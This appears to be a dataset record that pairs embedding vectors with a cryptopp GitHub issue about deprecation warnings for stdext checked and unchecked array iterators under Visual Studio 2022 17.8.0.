0.006510117556899786, -0.0140438387170434, -0.01060453150421381, -0.00834441464394331, -0.00043349602492526174, -0.0025733390357345343, -0.006383190862834454, -0.0032509644515812397, -0.002085080137476325, -0.013323222286999226, -0.012643549591302872, 0.0016111517325043678, -0.012422450818121433, -0.021012529730796814, -0.004909201990813017, 0.0013398968148976564, -0.0028333342634141445, 0.010301544331014156, -0.01853950507938862, 0.014838154427707195, 0.001993979327380657, -0.007152940612286329, -0.04585743322968483, 0.0059942216612398624, 0.00336356065236032, -0.00015034174430184066, -0.03313199430704117, 0.02423892915248871, 0.0035908007994294167, 0.005060695111751556, 0.008442681282758713, -0.005081167444586754, -0.0032816724851727486, -0.004030950367450714, 0.004995184484869242, 0.015001931227743626, 0.02330540306866169, -0.00930250808596611, -0.016451353207230568, -0.000055946322390809655, 0.0037115858867764473, -0.008532757870852947, 0.0020195695105940104, -0.0018998079467564821, 0.0010870668338611722, 0.011914743110537529, 0.0009980133036151528, -0.009466283954679966, -0.003216161858290434, -0.006935936398804188, -0.002501686802133918, 0.013667152263224125, 0.0004061146464664489, -0.0023706655483692884, 0.003949061967432499, -0.015542393550276756, 0.030315037816762924, 0.007898123934864998, -0.004475194029510021, 0.003521195612847805, -0.008348509669303894, -0.006219414062798023, 0.005597063340246677, -0.004061658401042223, 0.011038538999855518, 0.0015722548123449087, 0.018981700763106346, 0.0019786253105849028, -0.019571296870708466, 0.012119464576244354, -0.00881117768585682, 0.011538057588040829, 0.026089603081345558, -0.012618983164429665, -0.027940278872847557, 0.012717248871922493, 0.006944125518202782, 0.00884393323212862, -0.016205688938498497, 0.0011147040640935302, 0.02430443838238716, -0.0027432572096586227, 0.01320857834070921, 0.017966287210583687, -0.02766185812652111, 0.005318643059581518, 0.00188547745347023, -0.003998194821178913, -0.011841043829917908, 0.01111223828047514, 0.016803473234176636, 0.013527942821383476, -0.010653664357960224, 0.0202755369246006, -0.005142583511769772, 0.018490372225642204, 0.0104816984385252, -0.012627171352505684, -0.009245186112821102, -0.014387769624590874, 0.007423171773552895, 0.02399326302111149, 0.004995184484869242, 0.007181601598858833, -0.0005588874337263405, -0.0209633968770504, 0.003359466325491667, 0.012790948152542114, 0.0025180643424391747, -0.0012989527313038707, -0.013364166021347046, -0.0045529878698289394, -0.030396927148103714, -0.02356744557619095, -0.002413656795397401, -0.022912338376045227, 0.059811193495988846, -0.023026982322335243, 0.00555611914023757, 0.01786802150309086, -0.012160408310592175, -0.003398363245651126, 0.0046103098429739475, -0.002112717367708683, 0.005531552713364363, -0.0037484357599169016, -0.021356461569666862, -0.0010911612771451473, 0.009728326462209225, -0.015206651762127876, 0.002280588261783123, -0.01350337639451027, -0.0061293370090425014, -0.005597063340246677, -0.004769991617649794, -0.012299618683755398, -0.0037259163800626993, -0.008794800378382206, -0.018588637933135033, 0.003539620665833354, -0.006465079262852669, 0.009695571847259998, -0.010948462411761284, 0.00310356542468071, 0.00059215456712991, -0.012635360471904278, -0.011767344549298286, -0.00010683860455173999, -0.0006121148471720517, -0.008860311470925808, 0.014567923732101917, 0.006878614891320467, -0.009744704701006413, 0.0073699443601071835, -0.011210503987967968, 0.0012917874846607447, -0.001822014106437564, -0.020684977993369102, -0.0023563350550830364, 0.005736273247748613, -0.008860311470925808, 0.00834441464394331, 0.0005228054360486567, -0.011153182946145535, -0.005502891726791859, 0.009744704701006413, 0.0003851307847071439, 0.006002410314977169, -0.01228324044495821, 0.0311011653393507, -0.0003692649188451469, -0.009867536835372448, 0.0077384416945278645, -0.0054578534327447414, -0.0009458095300942659, -0.006182564422488213, -0.0008997473632916808, -0.0030708101112395525, -0.0037852854002267122, 0.0025487723760306835, -0.013937383890151978, -0.006661611143499613, -0.0012795042712241411, 0.0163367111235857, 0.008565513417124748, 0.028447985649108887, 0.008770233951508999, -0.006915464531630278, -0.004798652604222298, -0.003373796818777919, 0.0276782363653183, -0.03042968176305294, -0.00994123611599207, -0.006248075049370527, 0.010489887557923794, 0.014649812132120132, 0.010391621850430965, -0.0008490789914503694, 0.01324952207505703, -0.004186538048088551, -0.010915706865489483, 0.0054250978864729404, 0.0031383680179715157, 0.009236996993422508, 0.006002410314977169, 0.018506748601794243, 0.0009273846517316997, 0.002968449844047427, 0.021815035492181778, -0.008282998576760292, -0.0058263507671654224, 0.014371391385793686, 0.0035928478464484215, -0.002217124914750457, -0.004802747163921595, 0.010678230784833431, 0.020815998315811157, -0.001341944094747305, -0.02513969875872135, 0.0065592504106462, 0.0023420045617967844, -0.01433863677084446, 0.00704239122569561, -0.022945092990994453, -0.008770233951508999, 0.0003510959795676172, -0.01240607351064682, 0.03134683147072792, -0.0026368023827672005, 0.017573222517967224, 0.012234107591211796, -0.006170281209051609, -0.007083335425704718, 0.01970231905579567, 0.02564740739762783, 0.0012958819279447198, 0.013339599594473839, 0.0008598268614150584, 0.018916191533207893, -0.0037156804464757442, -0.017999041825532913, -0.020177269354462624, 0.009736515581607819, -0.0005860129604116082, -0.0028108148835599422, 0.03888055309653282, 0.013691718690097332, 0.0005087308818474412, 0.01944027654826641, 0.008942198939621449, 0.008704722858965397, -0.006935936398804188, -0.0020871274173259735, 0.03865126520395279, 0.015075630508363247, 0.002417751122266054, -0.01953854225575924, 0.04127169027924538, -0.020652221515774727, -0.010203278623521328, -0.016836227849125862, 0.004974712617695332, -0.00960549432784319, -0.00553564727306366, -0.011529868468642235, -0.028316965326666832, -0.007447738200426102, 0.01659875363111496, 0.02271580696105957, 0.005351398605853319, -0.01667245291173458, -0.001863981829956174, -0.013470620848238468, 0.025336232036352158, 0.018473993986845016, 0.007848991081118584, -0.001509814988821745, 0.007869462482631207, -0.01752408966422081, 0.0012672210577875376, -0.010334299877285957, 0.006002410314977169, 0.013216767460107803, -0.00228468282148242, 0.00976927112787962, -0.004360550548881292, 0.021913301199674606, -0.003908117767423391, 0.009654627181589603, -0.012127652764320374, 0.019800584763288498, 0.0250741895288229, 0.0073699443601071835, -0.0038630792405456305, 0.005506986286491156, -0.021356461569666862, 0.010055880062282085, -0.012438828125596046, -0.007857179269194603, -0.011881988495588303, -0.03201831504702568, 0.005396436899900436, -0.013061179779469967, 0.0019468936370685697, 0.017900776118040085, -0.009359829127788544, -0.023272646591067314, -0.006063826382160187, -0.00490510743111372, -0.0061907535418868065, -0.007275772746652365, -0.00981021486222744, -0.008991331793367863, -0.0012661974178627133, 0.00012929389777127653, 0.0013532036682590842, -0.003723869100213051, -0.013970139436423779, 0.007124279625713825, 0.011791910976171494 ]
null
null
null
null
null
null
null
null
null
[ "weidai11", "cryptopp" ]
I`m seeing compiler warnings since the latest VS 2022 update (17.8.0) on Windows 11 with the latest cryptopp 8.9 `17:30:31:685 1>X:\cryptopp\integer.cpp(3061,12): warning C4996: 'stdext::make_checked_array_iterator': warning STL4043: stdext::checked_array_iterator, stdext::unchecked_array_iterator, and related factory functions are non-Standard extensions and will be removed in the future. std::span (since C++20) and gsl::span can be used instead. You can define _SILENCE_STDEXT_ARR_ITERS_DEPRECATION_WARNING or _SILENCE_ALL_MS_EXT_DEPRECATION_WARNINGS to suppress this warning. 17:30:31:685 1>(compiling source file '/integer.cpp') 17:30:32:401 1>X:\cryptopp\zdeflate.cpp(422,155): warning C4996: 'stdext::unchecked_array_iterator<const CryptoPP::byte *>::operator -': warning STL4043: stdext::checked_array_iterator, stdext::unchecked_array_iterator, and related factory functions are non-Standard extensions and will be removed in the future. std::span (since C++20) and gsl::span can be used instead. You can define _SILENCE_STDEXT_ARR_ITERS_DEPRECATION_WARNING or _SILENCE_ALL_MS_EXT_DEPRECATION_WARNINGS to suppress this warning. ` It appears loosen from the platformSDK and loosen from the C++ standard Tried PlatformSDK: - 10.0.19041.0 - 10.0.22000.0 C++ Language standard: - ISO C++17 Standard (/std:c++17) - ISO C++20 Standard (/std:c++20)
Compile warnings in VS 2022 17.8.0 - stdext::make_checked_array_iterator stdext::make_unchecked_array_iterator beeing deprecated
https://api.github.com/repos/weidai11/cryptopp/issues/1250/comments
1
2023-11-21T16:35:32
2024-01-31T14:22:59Z
https://github.com/weidai11/cryptopp/issues/1250
2,004,715,353
1,250
false
This is a GitHub Issue repo:cryptopp owner:weidai11 Title : Compile warnings in VS 2022 17.8.0 - stdext::make_checked_array_iterator stdext::make_unchecked_array_iterator beeing deprecated Issue date: --- start body --- I`m seeing compiler warnings since the latest VS 2022 update (17.8.0) on Windows 11 with the latest cryptopp 8.9 `17:30:31:685 1>X:\cryptopp\integer.cpp(3061,12): warning C4996: 'stdext::make_checked_array_iterator': warning STL4043: stdext::checked_array_iterator, stdext::unchecked_array_iterator, and related factory functions are non-Standard extensions and will be removed in the future. std::span (since C++20) and gsl::span can be used instead. You can define _SILENCE_STDEXT_ARR_ITERS_DEPRECATION_WARNING or _SILENCE_ALL_MS_EXT_DEPRECATION_WARNINGS to suppress this warning. 17:30:31:685 1>(compiling source file '/integer.cpp') 17:30:32:401 1>X:\cryptopp\zdeflate.cpp(422,155): warning C4996: 'stdext::unchecked_array_iterator<const CryptoPP::byte *>::operator -': warning STL4043: stdext::checked_array_iterator, stdext::unchecked_array_iterator, and related factory functions are non-Standard extensions and will be removed in the future. std::span (since C++20) and gsl::span can be used instead. You can define _SILENCE_STDEXT_ARR_ITERS_DEPRECATION_WARNING or _SILENCE_ALL_MS_EXT_DEPRECATION_WARNINGS to suppress this warning. ` It appears loosen from the platformSDK and loosen from the C++ standard Tried PlatformSDK: - 10.0.19041.0 - 10.0.22000.0 C++ Language standard: - ISO C++17 Standard (/std:c++17) - ISO C++20 Standard (/std:c++20) --- end body ---
1,615
[ -0.050004925578832626, -0.004137020092457533, -0.01898629032075405, 0.035289108753204346, 0.023804999887943268, 0.009630204178392887, -0.03390409052371979, 0.022001590579748154, -0.015523744747042656, 0.0184524804353714, -0.009363299235701561, -0.0031758032273501158, 0.005691559053957462, -0.008151409216225147, -0.013215381652116776, 0.04807167127728462, -0.007361515425145626, 0.011354262940585613, -0.019173845648765564, -0.02390599064528942, 0.006971979513764381, 0.02371843531727791, 0.02097725309431553, 0.020212609320878983, -0.022867226973176003, 0.020861836150288582, 0.0027646259404718876, 0.0009512982796877623, -0.05571812391281128, 0.013677054084837437, 0.038116853684186935, 0.014961081556975842, 0.011671663261950016, -0.0025878918822854757, 0.01928926259279251, 0.016605790704488754, 0.05153421685099602, 0.016519226133823395, -0.012198259122669697, -0.008959336206316948, -0.013244235888123512, -0.05687230825424194, 0.012508445419371128, 0.0198519267141819, -0.02280951663851738, 0.0268635805696249, 0.007502181455492973, -0.0008494056528434157, -0.019880780950188637, 0.027310825884342194, -0.021525491029024124, -0.042733579874038696, -0.03569307178258896, -0.03295189142227173, 0.026618316769599915, -0.05508332699537277, 0.019318116828799248, 0.028320735320448875, 0.006971979513764381, 0.012328104116022587, -0.0306435264647007, 0.009103608317673206, -0.011989063583314419, 0.008937695063650608, 0.004706897772848606, 0.054477378726005554, -0.026834726333618164, 0.045994143933057785, -0.005125288385897875, 0.007466113194823265, -0.035721927881240845, -0.009305590763688087, 0.017904244363307953, 0.020140472799539566, 0.003134324913844466, -0.036674126982688904, 0.03566421568393707, -0.003924218006432056, -0.016822200268507004, 0.020775271579623222, -0.03523140028119087, 0.01928926259279251, -0.02229013480246067, -0.027801353484392166, 0.0003367866447661072, -0.011224417947232723, -0.025781534612178802, -0.05765137821435928, -0.007000833749771118, -0.019361399114131927, -0.02695014514029026, 0.03748205304145813, -0.001168609014712274, -0.03681840002536774, -0.003495006589218974, 0.02695014514029026, -0.03156687319278717, 0.010791599750518799, -0.07040508836507797, -0.024569645524024963, 0.015220772475004196, -0.0033272895961999893, -0.01924598030745983, -0.028912253677845, 0.026878008618950844, 0.005738447420299053, 0.042935561388731, 0.0019296476384624839, -0.00564827723428607, 0.08483236283063889, -0.011116213165223598, 0.007848436012864113, -0.02263638935983181, 0.004804281517863274, -0.009738408960402012, 0.015812290832400322, 0.007934999652206898, -0.004259651992470026, 0.0003656411718111485, 0.018524616956710815, -0.059613488614559174, -0.005839438643306494, 0.008980977348983288, -0.0021749113220721483, -0.04296441748738289, -0.009550854563713074, 0.037164654582738876, -0.023098062723875046, -0.006539161317050457, 0.016216253861784935, -0.016317244619131088, -0.015725726261734962, -0.004490488674491644, -0.020818553864955902, -0.021078243851661682, -0.004739359021186829, 0.03003758005797863, 0.028349589556455612, 0.0009125249926000834, -0.005078400019556284, -0.03199968859553337, -0.04157939925789833, 0.043945472687482834, 0.03482743352651596, -0.021539917215704918, -0.0014896158827468753, -0.008295681327581406, 0.014073804020881653, 0.004807888530194759, -0.01788981817662716, -0.011195563711225986, -0.028407299891114235, 0.036500997841358185, -0.008930481970310211, 0.08004250377416611, 0.003188427072018385, 0.01894300803542137, 0.014961081556975842, 0.006896235980093479, -0.046686653047800064, -0.029633617028594017, -0.013049467466771603, 0.03511597961187363, -0.0038412611465901136, -0.032634489238262177, -0.018726598471403122, 0.011570672504603863, 0.03390409052371979, -0.06272978335618973, 0.02263638935983181, -0.018466908484697342, 0.022189144045114517, 0.006272256374359131, -0.008237972855567932, -0.033153872936964035, -0.007022474892437458, -0.02563726343214512, -0.005814190488308668, 0.012515658512711525, -0.01724058948457241, 0.02151106297969818, 0.013417363166809082, -0.010820453986525536, -0.008980977348983288, 0.027671508491039276, -0.028219744563102722, 0.0252477265894413, -0.007386763580143452, 0.03857852518558502, -0.006333572324365377, -0.0022109795827418566, -0.02185731753706932, 0.011166708543896675, 0.004418352153152227, -0.01073389034718275, -0.0013895266456529498, -0.006200120318681002, -0.01849576272070408, -0.009204600006341934, 0.02477162703871727, 0.005226279143244028, 0.011916927061975002, -0.01784653589129448, -0.03295189142227173, -0.0045409840531647205, 0.002320987405255437, -0.00939936749637127, 0.03318272531032562, 0.005471542943269014, -0.04610956087708473, 0.0021965522319078445, 0.0054787565022706985, 0.01258058100938797, 0.00907475408166647, 0.0008327240939252079, 0.020270317792892456, -0.0006122573395259678, 0.025752680376172066, -0.022088153287768364, 0.0022236034274101257, 0.030095290392637253, -0.04192565381526947, 0.027931198477745056, -0.011325408704578876, -0.02746952697634697, -0.0031703931745141745, 0.022001590579748154, 0.005511218216270208, -0.01915941759943962, -0.005273167975246906, 0.024786053225398064, -0.03142260015010834, -0.01698089949786663, 0.022318990901112556, 0.044032033532857895, 0.011534604243934155, -0.0023083635605871677, -0.0009909732034429908, -0.03748205304145813, 0.00411537941545248, 0.023646298795938492, 0.022145863622426987, -0.05084170773625374, -0.030412690714001656, 0.0033543407917022705, 0.035202544182538986, -0.005565320141613483, 0.019967345520853996, -0.051303379237651825, 0.03678954392671585, 0.010762745514512062, 0.015567027032375336, -0.005377765744924545, -0.018741026520729065, -0.020659854635596275, -0.009507572278380394, 0.03488514572381973, 0.037193506956100464, -0.01667792722582817, -0.01427578553557396, 0.0285948533564806, 0.03122061677277088, -0.009622990153729916, 0.03961728885769844, 0.025521844625473022, 0.017514709383249283, 0.008836704306304455, 0.03730892762541771, -0.009457076899707317, -0.06913548707962036, 0.03955958038568497, 0.020342454314231873, 0.006863774731755257, 0.00855537224560976, 0.00578894279897213, 0.004230797756463289, 0.01784653589129448, 0.04631154239177704, 0.02647404372692108, -0.007855650037527084, -0.008916053920984268, 0.024223390966653824, 0.011960208415985107, 0.04489767178893089, 0.0245984997600317, 0.00023444317048415542, -0.058574724942445755, -0.008295681327581406, -0.02315577119588852, -0.010178440250456333, -0.009204600006341934, -0.004050456453114748, -0.03843425214290619, 0.01312881801277399, 0.008980977348983288, -0.0035400919150561094, -0.003696988569572568, 0.0020865441765636206, -0.051389943808317184, 0.003704202128574252, -0.02399255335330963, -0.03277876228094101, -0.008887199684977531, -0.04131970927119255, -0.05193817988038063, -0.011484108865261078, 0.040598344057798386, 0.01443448569625616, -0.022174717858433723, -0.033067308366298676, 0.020299172028899193, -0.007033294998109341, -0.004129806533455849, 0.004948554560542107, -0.01915941759943962, 0.026546180248260498, 0.03748205304145813, -0.018971862271428108, 0.006769997533410788, -0.008966549299657345, -0.04201221838593483, 0.03142260015010834, -0.04934127256274223, 0.010979154147207737, -0.0016113459132611752, -0.021655336022377014, -0.003302041906863451, 0.010070236399769783, -0.03197083622217178, -0.03805914521217346, 0.014564331620931625, 0.025839244946837425, -0.056958869099617004, -0.04515736177563667, 0.0072352769784629345, -0.029143089428544044, -0.05496790632605553, 0.013879035599529743, -0.004082918167114258, -0.00911803636699915, 0.0006880005239509046, 0.019750935956835747, -0.005897147580981255, 0.010640113614499569, -0.020039482042193413, -0.03396179899573326, 0.020313600078225136, 0.0002222701587015763, 0.03107634373009205, 0.024396518245339394, 0.0008164934115484357, -0.010878163389861584, 0.010207295417785645, 0.0005265954532660544, 0.03133603557944298, -0.035895053297281265, 0.0026546181179583073, -0.051563069224357605, 0.03485628962516785, 0.02742624469101429, -0.011671663261950016, -0.02328561805188656, -0.011137854307889938, 0.02529100887477398, -0.017269445583224297, -0.012811417691409588, -0.04455141723155975, -0.03508712723851204, 0.0005856570787727833, -0.027267543599009514, -0.018380343914031982, 0.038203418254852295, 0.005421047564595938, 0.0309609267860651, -0.0347408726811409, -0.0016591362655162811, 0.006239795126020908, 0.013705908320844173, 0.022737380117177963, 0.018784308806061745, -0.021698618307709694, 0.026575036346912384, 0.04030979797244072, -0.039242181926965714, 0.0214677806943655, -0.005861079320311546, -0.004894452169537544, 0.025262152776122093, -0.014376777224242687, -0.021453354507684708, -0.011765440925955772, 0.012710426934063435, -0.0013426380464807153, -0.049081578850746155, -0.033500127494335175, 0.07300199568271637, -0.035462234169244766, -0.007321840617805719, 0.014023308642208576, -0.04622498154640198, 0.018423626199364662, -0.015220772475004196, 0.04688863456249237, 0.012897981330752373, -0.0241656806319952, 0.04062720015645027, -0.00319383735768497, -0.015119781717658043, 0.007934999652206898, 0.022174717858433723, -0.0075598908588290215, -0.0364721454679966, -0.01644708961248398, 0.05107254534959793, 0.024670636281371117, 0.030181853100657463, 0.007000833749771118, 0.02394927106797695, -0.006589656695723534, 0.015163063071668148, 0.0018539044540375471, -0.04885074496269226, -0.0009080164600163698, 0.018611181527376175, 0.03860738128423691, 0.015855571255087852, -0.012046772055327892, 0.025521844625473022, 0.032057397067546844, -0.01341014914214611, 0.010705036111176014, 0.00740119069814682, 0.041810233145952225, 0.003783552208915353, -0.0487641803920269, -0.016822200268507004, -0.015134208835661411, -0.015898853540420532, -0.030758945271372795, 0.006669006776064634, -0.025709399953484535, 0.04645581543445587, 0.0035346816293895245, 0.011195563711225986, 0.024006981402635574, -0.005579747725278139, -0.03681840002536774, 0.017053036019206047, -0.028306307271122932, 0.015393899753689766, -0.005114467814564705, 0.0272963996976614, -0.0021713045425713062, -0.01767340861260891, -0.00723888399079442, -0.03055696189403534, 0.00298103503882885, -0.004717717878520489, 0.06671170890331268, -0.015235199593007565, 0.029835598543286324, 0.00681327935308218, 0.00009682052041171119, 0.00291070225648582, 0.0020973647478967905, 0.022102581337094307, 0.005835831630975008, -0.0171540267765522, 0.004129806533455849, 0.014571544714272022, -0.020255889743566513, 0.022621963173151016, 0.038203418254852295, 0.014189221896231174, 0.010012526996433735, 0.014044949784874916, -0.014499408192932606, -0.001065814751200378, -0.01827935315668583, -0.026575036346912384, 0.00957970879971981, -0.020659854635596275, -0.019188271835446358, -0.0011532800272107124, -0.004981015808880329, -0.00041906716069206595, -0.03869394585490227, 0.01395117212086916, -0.0023696795105934143, 0.03526025265455246, -0.02425224520266056, -0.010149586014449596, 0.011960208415985107, -0.024194534868001938, 0.01814950816333294, 0.020356880500912666, -0.006643759086728096, -0.014182008802890778, 0.028811262920498848, 0.044464852660894394, -0.002916112309321761, 0.020919544622302055, 0.01140475831925869, -0.013193740509450436, 0.008829490281641483, -0.03098978102207184, -0.031047489494085312, 0.005431868135929108, 0.027743645012378693, -0.001747503294609487, -0.011808722279965878, -0.008569799363613129, -0.000414333218941465, -0.040078964084386826, -0.012530085630714893, -0.01894300803542137, -0.0019693225622177124, 0.010214508511126041, 0.008086485788226128, 0.0006068471120670438, -0.008432740345597267, -0.032980743795633316, 0.022405553609132767, 0.04544590786099434, 0.02181403525173664, 0.017990808933973312, 0.018163936212658882, -0.008829490281641483, 0.010438131168484688, 0.004656401928514242, -0.018726598471403122, -0.00488723861053586, -0.011375904083251953, -0.0017429948784410954, -0.02063099853694439, 0.02106381766498089, -0.011433613486588001, 0.000138749775942415, -0.013381294906139374, 0.042560454457998276, -0.01928926259279251, -0.009276735596358776, -0.019837498664855957, -0.010185654275119305, -0.00503872474655509, 0.034625452011823654, -0.01928926259279251, -0.004667222499847412, 0.020169327035546303, 0.013612131588160992, -0.02237669937312603, 0.006135197356343269, -0.011137854307889938, -0.004670829512178898, -0.028796834871172905, 0.0011388527927920222, -0.014715817756950855, 0.02311249077320099, 0.008742926642298698, -0.020140472799539566, -0.017702262848615646, 0.026575036346912384, 0.01092865876853466, -0.012941263616085052, -0.011051290668547153, -0.010142371989786625, 0.03826112672686577, 0.017817681655287743, -0.041290853172540665, -0.005673524923622608, 0.02520444430410862, -0.0157545804977417, 0.007343481760472059, 0.010091876611113548, -0.02028474397957325, 0.01967879943549633, -0.009521999396383762, -0.004494095221161842, 0.012335318140685558, -0.029359498992562294, 0.002710523782297969, -0.008988190442323685, -0.03390409052371979, 0.010329927317798138, 0.0024580464232712984, -0.015999844297766685, -0.009861040860414505, -0.012328104116022587, -0.010106304660439491, -0.030845507979393005, -0.02373286336660385, 0.01972208172082901, 0.0032515465281903744, -0.010438131168484688, 0.014679749496281147, 0.019130563363432884, -0.010726677253842354, -0.013078322634100914, 0.03309616073966026, -0.0006902547902427614, -0.005082006566226482, 0.015235199593007565, 0.015177490189671516, -0.01075553148984909, -0.012912408448755741, 0.011498535983264446, -0.009644631296396255, -0.012890767306089401, -0.0009174843435175717, 0.01009909063577652, -0.04313754290342331, -0.0033687681425362825, 0.017442572861909866, -0.03595276176929474, 0.030239563435316086, -0.011332622729241848, 0.008548159152269363, 0.030932072550058365, -0.02533428929746151, 0.017168454825878143, 0.006737536285072565, -0.01375640369951725, -0.013179313391447067, 0.010618472471833229, 0.03878050670027733, 0.01924598030745983, 0.008259613066911697, -0.011202776804566383, 0.010070236399769783, -0.011368690058588982, -0.013684268109500408, -0.024410944432020187, 0.020746417343616486, -0.013749190606176853, -0.043426088988780975, 0.007336267735809088, 0.010178440250456333, -0.010019741021096706, -0.019693227484822273, -0.01566801778972149, -0.049081578850746155, 0.00024165681679733098, -0.007087397389113903, 0.03909790888428688, -0.020616572350263596, 0.015292908996343613, -0.017399290576577187, 0.02520444430410862, 0.030585817992687225, 0.004537377040833235, -0.022997071966528893, 0.014203649945557117, 0.009803331457078457, 0.03425034508109093, -0.00486559746786952, -0.022665245458483696, 0.028306307271122932, 0.0668848305940628, 0.000415234942920506, 0.013539995066821575, -0.053525179624557495, -0.003805193118751049, 0.007733018137514591, -0.013136031106114388, 0.0007745641632936895, -0.001942271483130753, -0.022650817409157753, -0.010914231650531292, 0.01548046339303255, 0.006412922404706478, 0.007318234071135521, -0.03996354341506958, -0.012097267434000969, 0.007033294998109341, -0.00737954955548048, -0.04524392634630203, -0.01902957260608673, 0.020530007779598236, -0.010971940122544765, -0.00273757497780025, 0.03243250772356987, 0.018351489678025246, -0.0056374566629529, -0.006932304240763187, -0.0028782407753169537, -0.002344431821256876, -0.0009404778247699142, -0.019707653671503067, -0.04593643546104431, -0.032749906182289124, -0.00853373110294342, -0.011339835822582245, -0.020861836150288582, 0.032749906182289124, 0.01029385905712843, -0.008108126930892467, 0.031162908300757408, -0.027613798156380653, 0.000705583777744323, -0.0000665007100906223, 0.013482285663485527, 0.014290213584899902, -0.04737916216254234, 0.03987697884440422, 0.005045938305556774, 0.005969284102320671, 0.018741026520729065, 0.005258740857243538, -0.03185541555285454, 0.001148771494626999, -0.02220357209444046, 0.009889895096421242, -0.0356065072119236, -0.0007799743907526135, 0.008656363002955914, 0.006423742976039648, 0.008908840827643871, 0.03199968859553337, -0.014254145324230194, -0.04279128834605217, -0.002140646567568183, -0.012573367916047573, -0.016952045261859894, -0.011512963101267815, 0.01641823537647724, -0.01644708961248398, -0.009644631296396255, -0.008778994902968407, -0.005179390776902437, 0.012097267434000969, -0.03756861761212349, 0.002147860126569867, 0.003504023654386401, 0.011541817337274551, -0.008605867624282837, 0.014261358417570591, -0.002319183899089694, -0.0054787565022706985, 0.03629901632666588, -0.014391204342246056, 0.011823149397969246, -0.0009855630341917276, -0.022232426330447197, -0.024959180504083633, -0.015235199593007565, -0.020703135058283806, 0.04541705176234245, 0.010640113614499569, -0.00957970879971981, 0.03782830759882927, 0.01676448993384838, -0.002890864619985223, -0.01260222215205431, -0.012869127094745636, 0.014355136081576347, -0.026329772546887398, -0.02106381766498089, -0.002048672642558813, 0.011657236143946648, -0.007033294998109341, -0.01347507257014513, -0.007022474892437458, -0.018120653927326202, 0.012811417691409588, 0.017875390127301216, -0.0032443327363580465, 0.017226163297891617, 0.013092749752104282, 0.02442537248134613, 0.012205472216010094, -0.010611258447170258, 0.006658186204731464, -0.017053036019206047, -0.017053036019206047, -0.01532176323235035, -0.019491244107484818, 0.0010775368427857757, -0.020255889743566513, 0.02106381766498089, -0.0028547965921461582, -0.024584071710705757, 0.01146968174725771, -0.04680206999182701, 0.01245073601603508, 0.009962031617760658, -0.005132501944899559, 0.027960052713751793, 0.0214677806943655, 0.022535398602485657, 0.0144561268389225, -0.007181174587458372, -0.03292303532361984, 0.06030599772930145, -0.017572417855262756, 0.0037330565974116325, -0.01993848942220211, -0.016230681911110878, 0.019433535635471344, -0.03407721593976021, -0.03782830759882927, 0.01801966316998005, -0.007523822598159313, -0.006019779480993748, -0.006715895142406225, -0.012998972088098526, -0.029446061700582504, -0.03485628962516785, 0.028811262920498848, 0.023011500015854836, 0.029114235192537308, 0.004851170349866152, -0.010488626547157764, 0.0038484749384224415, 0.0334424152970314, 0.014290213584899902, 0.019924063235521317, -0.03266334533691406, -0.028897825628519058, 0.02041459083557129, 0.01928926259279251, -0.0272963996976614, -0.00272675440646708, 0.00681327935308218, -0.02759937196969986, -0.025651689618825912, -0.003797979326918721, 0.007282165810465813, 0.005348911043256521, 0.018135081976652145, -0.01579786278307438, -0.0023859101347625256, 0.013915103860199451, -0.026502899825572968, -0.02873912639915943, 0.008454381488263607, 0.020429017022252083, -0.006474238354712725, 0.027714790776371956, -0.004393104463815689, 0.011895285919308662, 0.00485477689653635, -0.008988190442323685, -0.025435280054807663, -0.018394771963357925, 0.024021407589316368, -0.004952161107212305, -0.01532176323235035, 0.024396518245339394, -0.008122554048895836, 0.004577052313834429, 0.0016311834333464503, -0.014073804020881653, -0.02185731753706932, 0.03771289065480232, -0.006167659070342779, 0.005471542943269014, -0.0035400919150561094, -0.009363299235701561, -0.015336190350353718, -0.012768136337399483, 0.04022323340177536, 0.032143961638212204, 0.009038685820996761, 0.00447245454415679, 0.01644708961248398, -0.02293936349451542, 0.005796156823635101, -0.019476817920804024, 0.01294847670942545, -0.025781534612178802, -0.006979193072766066, -0.015163063071668148, -0.020385734736919403, -0.028277453035116196, -0.014153153635561466, 0.007109038531780243, 0.013612131588160992, 0.00469247018918395, 0.027440670877695084, 0.017341582104563713, 0.0033759817015379667, -0.044782254844903946, -0.005449902266263962, -0.006593263242393732, 0.020962826907634735, -0.019390253350138664, -0.006452597677707672, -0.017125172540545464, -0.05932494252920151, -0.0013823129702359438, 0.015999844297766685, 0.03678954392671585, -0.03756861761212349, 0.02133793570101261, 0.03416378051042557, -0.01641823537647724, -0.012465163134038448, -0.01414594054222107, -0.030441544950008392, -0.027354108169674873, -0.007029688451439142, -0.038030289113521576, -0.010618472471833229, -0.00023737370793242007, 0.027440670877695084, 0.018423626199364662, 0.03373096138238907, 0.03456774353981018, 0.02241998165845871, 0.0005112664657644928, 0.018582327291369438, -0.03707809001207352, -0.005507611203938723, -0.028666989877820015, 0.0028584033716470003, 0.03595276176929474, -0.0007610386237502098, 0.0031631793826818466, 0.018293781206011772, 0.0509282723069191, -0.012169403955340385, 0.037164654582738876, 0.00169790955260396, 0.030672380700707436, -0.010661753825843334, -0.020010625943541527, -0.01262386329472065, -0.008930481970310211, 0.024006981402635574, 0.0009972852421924472, -0.006748356390744448, 0.004984622355550528, -0.014138726517558098, -0.006831313483417034, -0.015191917307674885, -0.03505827113986015, -0.010416490957140923, 0.0016122476663440466, -0.01902957260608673, -0.016735635697841644, -0.019736507907509804, 0.009334444999694824, -0.015509317629039288, -0.01728387176990509, 0.027801353484392166, 0.02067428082227707, -0.00870685838162899, -0.02938835322856903, 0.0013985437108203769, 0.02368958108127117, -0.0043317885138094425, 0.003594194306060672, -0.02102053537964821, 0.003877329407259822, -0.028969962149858475, 0.020731989294290543, -0.04570559784770012, 0.006863774731755257, -0.021900599822402, 0.014557117596268654, 0.028984390199184418, 0.006730322726070881, -0.01129655446857214, -0.011116213165223598, 0.009723981842398643, 0.00447245454415679, -0.015653589740395546, 0.008043204434216022, -0.03543338179588318, -0.020703135058283806, 0.013727549463510513, -0.026416335254907608, -0.009918749332427979, 0.019433535635471344, -0.03347127139568329, 0.036068182438611984, 0.027354108169674873, -0.016389381140470505, -0.00521185202524066, 0.0035707498900592327, -0.012710426934063435, -0.014571544714272022, -0.00012443521700333804, -0.008028777316212654, 0.01059683132916689, -0.026964571326971054, 0.012292035855352879, 0.04524392634630203, -0.004050456453114748, 0.05280381813645363, -0.010769958607852459, 0.00842552725225687, 0.004173088353127241, -0.006427349988371134, 0.030701234936714172, 0.025997944176197052, -0.013806899078190327, -0.030181853100657463, -0.01862560771405697, -0.0031920340843498707, -0.027440670877695084, 0.003992747515439987, -0.0035274680703878403, 0.006405708845704794, -0.013525567948818207, -0.0009197386098094285, 0.007480540778487921, 0.057045433670282364, 